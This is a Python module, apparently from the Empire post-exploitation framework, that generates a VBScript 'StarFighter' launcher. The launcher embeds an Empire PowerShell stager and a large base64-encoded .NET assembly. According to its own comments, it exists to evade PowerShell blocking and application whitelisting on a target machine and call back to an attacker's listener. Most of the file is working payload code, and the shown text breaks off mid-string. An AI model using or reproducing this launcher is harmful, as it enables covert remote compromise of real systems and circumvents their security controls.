from lib.common import helpers

class Stager:

    def __init__(self, mainMenu, params=[]):

        self.info = {
            'Name': 'Js Launcher StarFighter',

            'Author': ['@Cn33liz'],

            'Description': ('Generates a .vbs launcher for Empire.'),

            'Comments': [
                'https://github.com/Cn33liz/StarFighters'
            ]
        }

        # any options needed by the stager, settable during runtime
        self.options = {
            # format:
            #   value_name : {description, required, default_value}
            'Listener': {
                'Description':   'Listener to generate stager for.',
                'Required':   True,
                'Value':   ''
            },
            'Language' : {
                'Description'   :   'Language of the stager to generate.',
                'Required'      :   True,
                'Value'         :   'powershell'
            },
            'StagerRetries': {
                'Description':   'Times for the stager to retry connecting.',
                'Required':   False,
                'Value':   '0'
            },
            'Base64' : {
                'Description'   :   'Switch. Base64 encode the output.',
                'Required'      :   True,
                'Value'         :   'True'
            },
            'Obfuscate' : {
                'Description'   :   'Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.',
                'Required'      :   False,
                'Value'         :   'False'
            },
            'ObfuscateCommand' : {
                'Description'   :   'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.',
                'Required'      :   False,
                'Value'         :   r'Token\All\1,Launcher\STDIN++\12467'
            },
            'OutFile': {
                'Description':   'File to output VBS to, otherwise displayed on the screen.',
                'Required':   False,
                'Value':   '/tmp/launcher.vbs'
            },
            'UserAgent': {
                'Description':   'User-agent string to use for the staging request (default, none, or other).',
                'Required':   False,
                'Value':   'default'
            },
            'Proxy': {
                'Description':   'Proxy to use for request (default, none, or other).',
                'Required':   False,
                'Value':   'default'
            },
            'ProxyCreds': {
                'Description':   'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
                'Required':   False,
                'Value':   'default'
            }
        }

        # save off a copy of the mainMenu object to access external functionality
        #   like listeners/agent handlers/etc.
        self.mainMenu = mainMenu

        for param in params:
            # parameter format is [Name, Value]
            option, value = param
            if option in self.options:
                self.options[option]['Value'] = value

    def generate(self):

        # extract all of our options
        language = self.options['Language']['Value']
        listenerName = self.options['Listener']['Value']
        base64 = self.options['Base64']['Value']
        obfuscate = self.options['Obfuscate']['Value']
        obfuscateCommand = self.options['ObfuscateCommand']['Value']
        userAgent = self.options['UserAgent']['Value']
        proxy = self.options['Proxy']['Value']
        proxyCreds = self.options['ProxyCreds']['Value']
        stagerRetries = self.options['StagerRetries']['Value']

        encode = False
        if base64.lower() == "true":
            encode = True
            
        obfuscateScript = False
        if obfuscate.lower() == "true":
            obfuscateScript = True

        # generate the launcher code
        launcher = self.mainMenu.stagers.generate_launcher(
            listenerName, language=language, encode=encode, obfuscate=obfuscateScript, obfuscationCommand=obfuscateCommand, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries)
	launcher = launcher.replace("powershell -noP -sta -w 1 -enc  ","")
        if launcher == "":
            print helpers.color("[!] Error in launcher command generation.")
            return ""
        else:
            code ="""'  _________ __              ___________.__       .__     __                       """"\n"
            code +="""' /   _____//  |______ ______\_   _____/|__| ____ |  |___/  |_  ___________  ______""""\n"
            code +="""' \_____  \\   __\__  \\_  __ \    __)  |  |/ ___\|  |  \   __\/ __ \_  __ \/  ___/""""\n"
            code +="""' /        \|  |  / __ \|  | \/     \   |  / /_/  >   Y  \  | \  ___/|  | \/\___ \ """"\n"
            code +="""'/_______  /|__| (____  /__|  \___  /   |__\___  /|___|  /__|  \___  >__|  /____  >""""\n"
            code +="""'        \/           \/          \/      /_____/      \/          \/           \/ """"\n"
            code +="""'                                                                 By Cn33liz 2017""""\n"
            code +="\n"
            code +="""'A JavaScript and VBScript Based Empire Launcher, which runs within their own embedded PowerShell Host.""""\n"
            code +="""'These Launchers are usefull when a company is blocking PowerShell.exe and/or is using a Application Whitelisting solution, but does not block running JS/VBS files.""""\n"
            code +="\n"
            code +="""'Empire PowerShell Host build by Cn33liz and embedded within JavaScript using DotNetToJScript from James Forshaw""""\n"
            code +="""'https://github.com/tyranid/DotNetToJScript""""\n"
            code +="\n"
            code +="""'Usage:""""\n"
            code +="""'Setup a new Listener within PowerShell Empire and use the Launcher command to Generate a PowerShell launcher for the listener.""""\n"
            code +="""'Copy the Base64 encoded Launcher Payload and Replace the below EncodedPayload string value.""""\n"
            code +="\n"
            code +="Dim EncodedPayload: EncodedPayload = \"" + launcher + "\"\n"
            code +="\n"
            code +="""'Then run: wscript.exe StarFighter.js or StarFighter.vbs on Target, or DoubleClick the launchers within Explorer.""""\n"
            code +="\n"
            code +="Sub Debug(s)""\n"
            code +="End Sub""\n"
            code +="Sub SetVersion""\n"
            code +="End Sub""\n"
            code +="Function Base64ToStream(b)""\n"
            code +="  Dim enc, length, ba, transform, ms""\n"
            code +="  Set enc = CreateObject(\"System.Text.ASCIIEncoding\")""\n"
            code +="  length = enc.GetByteCount_2(b)""\n"
            code +="  Set transform = CreateObject(\"System.Security.Cryptography.FromBase64Transform\")""\n"
            code +="  Set ms = CreateObject(\"System.IO.MemoryStream\")""\n"
            code +="  ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, ((length / 4) * 3)""\n"
            code +="  ms.Position = 0""\n"
            code +="  Set Base64ToStream = ms""\n"
            code +="End Function""\n"
            code +="\n"
            code +="Sub Run""\n"
            code +="Dim s, entry_class""\n"
            code +="s = \"AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy\"\n"
            code +="s = s & \"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph\"\n"
            code +="s = s & \"dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk\"\n"
            code +="s = s & \"ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD\"\n"
            code +="s = s & \"AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl\"\n"
            code +="s = s & \"RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU\"\n"
            code +="s = s & \"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl\"\n"
            code +="s = s & \"cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90\"\n"
            code +="s = s & \"aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu\"\n"
            code +="s = s & \"MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH\"\n"
            code +="s = s & \"dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA\"\n"
            code +="s = s & \"ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw\"\n"
            code +="s = s & \"B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu\"\n"
            code +="s = s & \"dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA\"""\n"
            code +="s = s & \"CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u\"\n"
            code +="s = s & \"SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5\"\n"
            code +="s = s & \"cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR\"\n"
            code +="s = s & \"AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA\"\n"
            code +="s = s & \"AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y\"\n"
            code +="s = s & \"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh\"\n"
            code +="s = s & \"NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz\"\n"
            code +="s = s & \"ZW1ibHkGFwAAAARMb2FkCg8MAAAAAHoAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA\"\n"
            code +="s = s & \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy\"\n"
            code +="s = s & \"YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAIvEzWQAAAAAA\"\n"
            code +="s = s & \"AAAA4AAiIAsBMAAAcgAAAAYAAAAAAADGkQAAACAAAACgAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA\"\n"
            code +="s = s & \"AAAAAAAAAOAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAdJEA\"\n"
            code +="s = s & \"AE8AAAAAoAAAiAMAAAAAAAAAAAAAAAAAAAAAAAAAwAAADAAAADyQAAAcAAAAAAAAAAAAAAAAAAAA\"\n"
            code +="s = s & \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA\"\n"
            code +="s = s & \"AAAALnRleHQAAADMcQAAACAAAAByAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAiAMAAACg\"\n"
            code +="s = s & \"AAAABAAAAHQAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAwAAAAAIAAAB4AAAAAAAAAAAA\"\n"
            code +="s = s & \"AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAKiRAAAAAAAASAAAAAIABQBIPQAA9FIAAAEAAAAAAAAA\"\n"
            code +="s = s & \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEzACAB4AAAAB\"\n"
            code +="s = s & \"AAARKBEAAAoDKBIAAApvEwAACgp+AQAABAZvCwAABhcqHgIoFAAACioucwQAAAaAAQAABCoAABsw\"\n"
            code +="s = s & \"AwDmAAAAAgAAEQJzFAAACn0HAAAEAigUAAAKKBUAAAoKBnIBAABwcxYAAApvFwAACgICcw0AAAZ9\"\n"
            code +="s = s & \"BAAABAICewQAAAQGKBgAAAp9BQAABAJ7BQAABG8ZAAAKAnsHAAAECwcoGgAACgIoGwAACn0GAAAE\"\n"
            code +="s = s & \"3gcHKBwAAArcAAJ7BgAABAJ7BQAABG8dAAAKcg0AAHAoOAAABgwWDSsiCAmaEwQCewYAAAQRBG8e\"\n"
            code +="s = s & \"AAAKAnsGAAAEbx8AAAomCRdYDQkIjmky2N4pAnsHAAAECwcoGgAACgJ7BgAABG8gAAAKAhR9BgAA\"\n"
            code +="s = s & \"BN4HBygcAAAK3NwqAAABKAAAAgBdAA1qAAcAAAAAAgDJABTdAAcAAAAAAgByAEq8ACkAAAAAHgJ7\"\n"
            code +="s = s & \"AgAABCoiAgN9AgAABCoeAnsDAAAEKiICA30DAAAEKgAAGzAFAMoAAAADAAARAyghAAAKLAEqAnsH\"\n"
            code +="s = s & \"AAAECgYoGgAACgIoGwAACn0GAAAE3gcGKBwAAArcAAJ7BgAABAJ7BQAABG8dAAAKAnsGAAAEA28i\"\n"
            code +="s = s & \"AAAKJgJ7BgAABHIjAABwbyMAAAomAnsGAAAEbyQAAApvJQAAChZvJgAAChgXbycAAAoELBgCewYA\"\n"
            code +="s = s & \"AAQXjRAAAAElFgSibygAAAom3jcCewYAAARvHwAACibeKQJ7BwAABAoGKBoAAAoCewYAAARvIAAA\"\n"
            code +="s = s & \"CgIUfQYAAATeBwYoHAAACtzcKgAAASgAAAIAFgANIwAHAAAAAAIArQAUwQAHAAAAAAIAKwB1oAAp\"\n"
            code +="s = s & \"AAAAABswBQAKAQAABAAAEQM5AwEAAAN1FgAAAQsHLAkHbykAAAoKKw4DcjsAAHAWFHMqAAAKCgJ7\"\n"
            code +="s = s & \"BwAABAwIKBoAAAoCKBsAAAp9BgAABN4HCCgcAAAK3AJ7BgAABAJ7BQAABG8dAAAKAnsGAAAEcmUA\"\n"
            code +="s = s & \"AHBvIgAACnJzAABwbyMAAAomcysAAAoTBBEEBm8sAAAKEQRvLQAACgJ7BgAABBEEbygAAAoNCW8u\"\n"
            code +="s = s & \"AAAKFjE9CRZvLwAACm8wAAAKdUMAAAETBREFKCEAAAotIQJ7BAAABG8xAAAKEQUWEQVvMgAAChhZ\"\n"
            code +="s = s & \"bzMAAApvNAAACt4pAnsHAAAEDAgoGgAACgJ7BgAABG8gAAAKAhR9BgAABN4HCCgcAAAK3NwqAAAB\"\n"
            code +="s = s & \"KAAAAgA0AA1BAAcAAAAAAgDtABQBAQcAAAAAAgBZAIfgACkAAAAAGzADABUAAAAFAAARAgMUKAkA\"\n"
            code +="s = s & \"AAbeCgoCBigKAAAG3gAqAAAAARAAAAAAAAAKCgAKGgAAARswAgBfAAAABgAAEQJ7BwAABAoGKBoA\"\n"
            code +="s = s & \"AAoCewYAAAQsHgJ7BgAABG81AAAKbzYAAAoXMwsCewYAAARvNwAACt4HBigcAAAK3AQXbzgAAAre\"\n"
            code +="s = s & \"GQsCewQAAARvMQAACgdvOQAACm80AAAK3gAqAAEcAAACAA0AKDUABwAAAAAAAAAARUUAGRUAAAHm\"\n"
            code +="s = s & \"Aig6AAAKbzsAAAp9CwAABAIoOgAACm88AAAKfQwAAAQCczYAAAZ9DQAABAIoPQAACgIDfQoAAAQq\"\n"
            code +="s = s & \"HgJ7CwAABCoeAnsMAAAEKhp+CQAABCoacokAAHAqHgJ7DQAABCoqFxYWFnM+AAAKKioCewgAAAQU\"\n"
            code +="s = s & \"/gMqMgJ7CgAABHsFAAAEKjYCewoAAAQDfQUAAAQqLnKXAABwcz8AAAp6LnI+AQBwcz8AAAp6Bipm\"\n"
            code +="s = s & \"AnsKAAAEF28GAAAGAnsKAAAEA28IAAAGKlICAnsIAAAEKBYAAAYCFH0IAAAEKlICAigVAAAGfQgA\"\n"
            code +="s = s & \"AAQCAygWAAAGKi4oQAAACoAJAAAEKh4Cew4AAAQqABswBwCBAAAABwAAEQIfCRYDcrYBAHAEcroB\"\n"
            code +="s = s & \"AHAoQQAACm9CAAAKc0MAAAoKBW9EAAAKCys/B29FAAAKDAhvRgAACig0AAAGDQIJF5pvRwAACihI\"\n"
            code +="s = s & \"AAAKEwQRBC0FFBMF3ikGCG9JAAAKEQQoSgAACm9LAAAKB29MAAAKLbneCgcsBgdvTQAACtwGKhEF\"\n"
            code +="s = s & \"KgAAAAEQAAACACcAS3IACgAAAAATMAkA/QAAAAgAABECHwkWA3K2AQBwBHK2AQBwKEEAAApvTgAA\"\n"
            code +="s = s & \"CgUoNQAABgpzTwAACgsWDCs2ByhQAAAKcr4BAHAYjRAAAAElFgYWCChRAAAKoiUXBhcIKFEAAAqi\"\n"
            code +="s = s & \"KFIAAApvUwAACiYIF1gMCAVvVAAACjLBByhQAAAKctQBAHAXjRAAAAElFgYWDgQoUQAACqIoUgAA\"\n"
            code +="s = s & \"Cm9TAAAKJgIfCxYHbzkAAApvTgAACihIAAAKb1UAAAooUAAACm9WAAAKDQlvMgAACi0DDgQqFhME\"\n"
            code +="s = s & \"KxoGFhEEKFEAAAoJKFcAAAosAxEEKhEEF1gTBBEEBW9UAAAKMtwCcvgBAHAJKFgAAApvNAAACiuV\"\n"
            code +="s = s & \"AAAAGzAJAPoBAAAJAAARAh8JFgNytgEAcARytgEAcChBAAAKb04AAAoFKDUAAAYKc08AAAoLFhME\"\n"
            code +="s = s & \"KzoHKFAAAApyvgEAcBiNEAAAASUWBhYRBChRAAAKoiUXBhcRBChRAAAKoihSAAAKb1MAAAomEQQX\"\n"
            code +="s = s & \"WBMEEQQFb1QAAAoyvHNZAAAKDA4EOcUAAAAWEwUOBG9aAAAKEwYrFxEGb1sAAAoTBxEFF1gTBQgR\"\n"
            code +="s = s & \"B29cAAAKEQZvTAAACi3g3gwRBiwHEQZvTQAACtwRBTmCAAAABxEFFy4HchoCAHArBXJGAgBwb1MA\"\n"
            code +="s = s & \"AAomDgRvWgAAChMGKywRBm9bAAAKEwgHKFAAAApybgIAcBeNEAAAASUWBhYRCChRAAAKom9dAAAK\"\n"
            code +="s = s & \"JhEGb0wAAAoty94MEQYsBxEGb00AAArcBwdvXgAAChdZF29fAAAKJgdyfAIAcG9TAAAKJgIfCxYH\"\n"
            code +="s = s & \"bzkAAApvTgAACnNZAAAKDShQAAAKcoACAHAXjRAAAAElFglvYAAACoxSAAABoihSAAAKEwkCHwsW\"\n"
            code +="s = s & \"EQlvQgAACihIAAAKb1UAAAooUAAACm9WAAAKEwoRCm8yAAAKLQwJb2AAAAosAgkqCCoWEwsrIgYW\"\n"
            code +="s = s & \"EQsoUQAAChEKKFcAAAosCgkRC29cAAAKK4QRCxdYEwsRCwVvVAAACjLUAnL4AQBwEQooWAAACm80\"\n"
            code +="s = s & \"AAAKOF3///8AAAEcAAACAIkAJK0ADAAAAAACAOEAORoBDAAAAAATMAUAKAAAAAoAABEOBAMEBRQo\"\n"
            code +="s = s & \"bgAABgoGLBcGb3kAAAYGb30AAAYoiwAABnNhAAAKKhQqEzAFACgAAAAKAAARDgQDBAUUKG4AAAYK\"\n"
            code +="s = s & \"BiwXBm95AAAGBm99AAAGKIsAAAZzYQAACioUKhooSAAACiouKEgAAAooiwAABioeAyhiAAAKKgAT\"\n"
            code +="s = s & \"MAIAKQAAAAsAABEoYwAACgooZAAACgMoZQAACgQoZgAACgUoYgAACgYoZQAACihmAAAKKgAAABMw\"\n"
            code +="s = s & \"AgApAAAACwAAEShjAAAKCihkAAAKAyhlAAAKBChmAAAKBShnAAAKBihlAAAKKGYAAAoqAAAAEzAJ\"\n"
            code +="s = s & \"ACIAAAAAAAAAAhwWKFAAAApymgIAcBeNEAAAASUWA6IoUgAACm9OAAAKKi4CHwwWA29OAAAKKhoo\"\n"
            code +="s = s & \"aAAACioeAyhnAAAKKgAAABMwCQAjAAAAAAAAAAIfDhYoUAAACnKwAgBwF40QAAABJRYDoihSAAAK\"\n"
            code +="s = s & \"b04AAAoqABMwCQAjAAAAAAAAAAIfDhYoUAAACnLKAgBwF40QAAABJRYDoihSAAAKb04AAAoqABMw\"\n"
            code +="s = s & \"BQBzAAAADAAAERiNQwAAASUWfmkAAAqiJRd+aQAACqIKAheNUwAAASUWHyadb2oAAAoLB45pGDM+\"\n"
            code +="s = s & \"BxeabzIAAAoWMR4GFgcXmhZvawAACgwSAihsAAAKKFAAAApvVgAACqIGFwcWmgcXmihYAAAKb1UA\"\n"
            code +="s = s & \"AAqiKwQGFwKiBioAEzAFAEgAAAANAAARGAJvVAAACnNtAAAKChYLKywCB29uAAAKb28AAAooNAAA\"\n"
            code +="s = s & \"BgwGFgcIFpoocAAACgYXBwgXmihwAAAKBxdYCwcCb1QAAAoyywYqSgJzWAAABn0OAAAEAihxAAAK\"\n"
            code +="s = s & \"KgATMAQAXwAAAAAAAAAFc3IAAAolb3MAAApy5AIAcAJzdAAACm91AAAKJW9zAAAKcgYDAHADc3QA\"\n"
            code +="s = s & \"AApvdQAACiVvcwAACnIuAwBwBHN0AAAKb3UAAAolb3MAAApyVgMAcAVzdAAACm91AAAKKiICFig5\"\n"
            code +="s = s & \"AAAGKhMwBADkAAAADgAAEXN2AAAKChQWAyg7AAAGCwIWAyg7AAAGDBQXAyg7AAAGDQIXAyg7AAAG\"\n"
            code +="s = s & \"EwQHCAkRBCg3AAAGEwVzdwAAChMGEQZyhAMAcG94AAAKJhEGcp4DAHByqAMAcG95AAAKJhEGcrgD\"\n"
            code +="s = s & \"AHARBW95AAAKJhEGcsQDAHAWjFcAAAFveQAACiYGEQZvegAAChqNQwAAASUWB6IlFwiiJRgJoiUZ\"\n"
            code +="s = s & \"EQSiEwcWEwgrMBEHEQiaEwkRCSh7AAAKLBpzdwAAChMGEQYRCRZvfAAACiYGEQZvegAAChEIF1gT\"\n"
            code +="s = s & \"CBEIEQeOaTLIBm99AAAKKiYCAxYoOwAABioAABMwAwBeAAAADwAAERQKAywVGyh+AAAKCgZy0gMA\"\n"
            code +="s = s & \"cCh/AAAKCisVAig9AAAGCgYoIQAACiwGfmkAAAoqBC0HcvYDAHArBXIOBABwCwIoIQAACi0NAnIw\"\n"
            code +="s = s & \"BABwByiAAAAKCwYHKH8AAAolCioAABswAgBwAAAAEAAAEXI0BABwCn6BAAAKBm+CAAAKDAgsEwhy\"\n"
            code +="s = s & \"lgQAcG+DAAAKdUMAAAEN3kbeCggsBghvTQAACtwohAAACgsHLAwHb4UAAAoohgAACirQGAAAASiH\"\n"
            code +="s = s & \"AAAKKIgAAAoLBywMB2+FAAAKKIYAAAoqfmkAAAoqCSoBEAAAAgASABgqAAoAAAAAGzABABQAAAAB\"\n"
            code +="s = s & \"AAARfmkAAAoKAig8AAAGCt4DJt4ABioBEAAAAAAGAAkPAAM0AAABGihkAAAKKh4DKGYAAAoqQiiJ\"\n"
            code +="s = s & \"AAAKKIoAAApziwAACipSDwEojAAACg8BKI0AAAoojgAACioucrYEAHBzPwAACnoaKI8AAAoqHgMo\"\n"
            code +="s = s & \"kAAACioaKGMAAAoqHgMoZQAACioaKJEAAAoqQiiSAAAKKJMAAApziwAACipCKJQAAAoolQAACnOW\"\n"
            code +="s = s & \"AAAKKlIPASiXAAAKDwEomAAACiiZAAAKKkIomgAACiibAAAKc4sAAAoqUg8BKIwAAAoPASiNAAAK\"\n"
            code +="s = s & \"KJwAAAoqGiidAAAKKh4DKJ4AAAoqLnJDBQBwcz8AAAp6LnLSBQBwcz8AAAp6LnJQBgBwcz8AAAp6\"\n"
            code +="s = s & \"LnLpBgBwcz8AAAp6HgIonwAACioqAgMUFChbAAAGKi4CAwQUFChcAAAGKj4CA36gAAAKBAUoXAAA\"\n"
            code +="s = s & \"Biq+KKEAAApvogAACm+jAAAKHDIMAgMEBQ4EKGQAAAYqKKQAAAoCAwQFDgQobwAABio2AgN+oAAA\"\n"
            code +="s = s & \"CiheAAAGKj4CA36gAAAKFBQoYAAABio+AgN+oAAACgQFKGAAAAYqviihAAAKb6IAAApvowAAChwy\"\n"
            code +="s = s & \"DAIDBAUOBChpAAAGKiikAAAKAgMEBQ4EKHUAAAYqSgIDfmkAAAp+aQAACihjAAAGKiYCAwQoYgAA\"\n"
            code +="s = s & \"Bio+AgN+oAAACgQFKGQAAAYqegIDc5oAAAYlBG+RAAAGJRZvlQAABgUOBChlAAAGKgAbMAMArAAA\"\n"
            code +="s = s & \"ABEAABEDKCEAAAosEQQoIQAACiwJAhQUKAEAACsqc6UAAAoKc6UAAAoLAyghAAAKLSQDDBYNKxUI\"\n"
            code +="s = s & \"CW9rAAAKEwQGEQRvpgAACgkXWA0JCG8yAAAKMuIEKCEAAAotJAQMFg0rFQgJb2sAAAoTBQcRBW+m\"\n"
            code +="s = s & \"AAAKCRdYDQkIbzIAAAoy4gZvpwAACgdvpwAACgIGBygBAAArEwbeFAcsBgdvTQAACtwGLAYGb00A\"\n"
            code +="s = s & \"AArcEQYqARwAAAIAJQBwlQAKAAAAAAIAHwCAnwAKAAAAAD4CA36gAAAKFBQoaQAABiouAgMEFBQo\"\n"
            code +="s = s & \"aQAABio+AgN+oAAACgQFKGkAAAYqegIDc5oAAAYlBG+RAAAGJRZvlQAABgUOBChqAAAGKiYCAwQo\"\n"
            code +="s = s & \"AgAAKyoAAAAbMAkA7AEAABIAABFzuAAABiUCb4wAAAZ9WAAABCUCb44AAAZ9VwAABCUCb5AAAAZ9\"\n"
            code +="s = s & \"VgAABCUCb5IAAAZ9WQAABAoCb5YAAAYLfqAAAAoMfqAAAAoNFhMEfqAAAAoTBRYTBn6gAAAKEwcW\"\n"
            code +="s = s & \"EwgCb5QAAAYTCQMtAwQsIgMtB3OlAAAKEAEELQdzpQAAChACAyioAAAKDAQoqAAACg0IfqAAAAoo\"\n"
            code +="s = s & \"qQAACi0NCX6gAAAKKKkAAAosVyAABAAAEwgRCCiqAAAKEwcWCAkRBxIIKK8AAAYtOSirAAAKEwsR\"\n"
            code +="s = s & \"Cx96MyQRBxEIKKwAAAoTBxYICREHEggorwAABi0TKKsAAApzrQAACnoRC3OtAAAKegYCb5gAAAYS\"\n"
            code +="s = s & \"BBEHEQgSBRIGEgkHKK0AAAYTChEKLCIRCiDHBAAAMxESDP4VDgAAGxEMEwzdrwAAABEKc60AAAp6\"\n"
            code +="s = s & \"0A4AABsohwAACtALAAACKIcAAAozIBcRBREGKLMAAAYlEQlviQAABnUOAAAbpQ4AABsTDN5xFxEF\"\n"
            code +="s = s & \"EQYosgAABiURCW+AAAAGdQ4AABulDgAAGxMM3lERB36gAAAKKKkAAAosBxEHKK4AAAoRBX6gAAAK\"\n"
            code +="s = s & \"KKkAAAosBxEFKK4AAAoIfqAAAAooqQAACiwGCCiuAAAKCX6gAAAKKKkAAAosBgkorgAACtwRDCpB\"\n"
            code +="s = s & \"HAAAAgAAAGgAAAAwAQAAmAEAAFEAAAAAAAAAOgIDBHOrAAAGKHAAAAYqKgIDBAUobQAABipGAgME\"\n"
            code +="s = s & \"fqAAAAoFDgQobwAABipmAgMEc6sAAAYlBW+iAAAGDgQOBShxAAAGKiYCFBQocQAABiobMAMAkwAA\"\n"
            code +="s = s & \"ABEAABFzpQAACgpzpQAACgsDKCEAAAotJAMMFg0rFQgJb2sAAAoTBAYRBG+mAAAKCRdYDQkIbzIA\"\n"
            code +="s = s & \"AAoy4gQoIQAACi0kBAwWDSsVCAlvawAAChMFBxEFb6YAAAoJF1gNCQhvMgAACjLiBm+nAAAKB2+n\"\n"
            code +="s = s & \"AAAKAgYHKAMAACsTBt4UBywGB29NAAAK3AYsBgZvTQAACtwRBioAARwAAAIADABwfAAKAAAAAAIA\"\n"
            code +="s = s & \"BgCAhgAKAAAAADoCAwRzqwAABih2AAAGKjICAwQFFBQodQAABipGAgMEfqAAAAoFDgQodQAABipm\"\n"
            code +="s = s & \"AgMEc6sAAAYlBW+iAAAGDgQOBSh3AAAGKiYCFBQoBAAAKyomAgMEKAQAACsqGzAKACMCAAATAAAR\"\n"
            code +="s = s & \"Ai0LcnwHAHBzrwAACnoDLB0Db7AAAAogAQIAADEQcowHAHByngcAcHOxAAAKegQsHQRvsAAACiAA\"\n"
            code +="s = s & \"AQAAMRBy1AcAcHLmBwBwc7EAAAp6c7gAAAYlAm+bAAAGfVgAAAQlAm+dAAAGfVcAAAQlAm+hAAAG\"\n"
            code +="s = s & \"fVYAAAQlAm+jAAAGfVkAAAQKfqAAAAoLfqAAAAoMAm+lAAAGDQMtFSAEBAAAKKoAAAoLBxYWKLIA\"\n"
            code +="s = s & \"AAorEwMoqAAACgsHIAQEAAAorAAACgsELRUgAgIAACiqAAAKDAgWFiiyAAAKKxMEKKgAAAoMCCAC\"\n"
            code +="s = s & \"AgAAKKwAAAoMByACBAAAFiiyAAAKCCAAAgAAFiiyAAAKBgJvnwAABn6gAAAKAm+pAAAGByABAgAA\"\n"
            code +="s = s & \"CCAAAQAAEgMCb6cAAAYorAAABhMEEQQfVzAMEQQsQxEEH1cuJSszEQQg7AMAAC4iEQQgxwQAADMh\"\n"
            code +="s = s & \"EgX+FQ4AABsRBRMF3bkAAAARBHOtAAAKehEEc60AAAp6EQRzrQAACnrQDgAAGyiHAAAK0AsAAAIo\"\n"
            code +="s = s & \"hwAACjMyc4oAAAYlByi0AAAGb4MAAAYlCCi0AAAGb4cAAAYlCW+JAAAGdQ4AABulDgAAGxMF3llz\"\n"
            code +="s = s & \"gQAABiUHKLMAAApvegAABiUIKLMAAApvfgAABiUJb4AAAAZ1DgAAG6UOAAAbEwXeJwd+oAAACiip\"\n"
            code +="s = s & \"AAAKLAYHKK4AAAoIfqAAAAooqQAACiwGCCiuAAAK3BEFKgBBHAAAAgAAAJcAAABiAQAA+QEAACcA\"\n"
            code +="s = s & \"AAAAAAAAHgJ7EwAABCoiAgN9EwAABCoeAnsUAAAEKiICA30UAAAEKh4CexUAAAQqIgIDfRUAAAQq\"\n"
            code +="s = s & \"HgJ7FgAABCoiAgN9FgAABCoeAnsXAAAEKiICA30XAAAEKh4CexgAAAQqIgIDfRgAAAQqHgJ7GQAA\"\n"
            code +="s = s & \"BCoiAgN9GQAABCoeAnsaAAAEKiICA30aAAAEKhMwAwA0AAAAFAAAEXO2AAAGCgZzpQAACn1PAAAE\"\n"
            code +="s = s & \"Am+0AAAKKAUAACsG/ga3AAAGc7YAAApvtwAACgZ7TwAABCoeAns7AAAEKoIDbzIAAAoggAAAADEL\"\n"
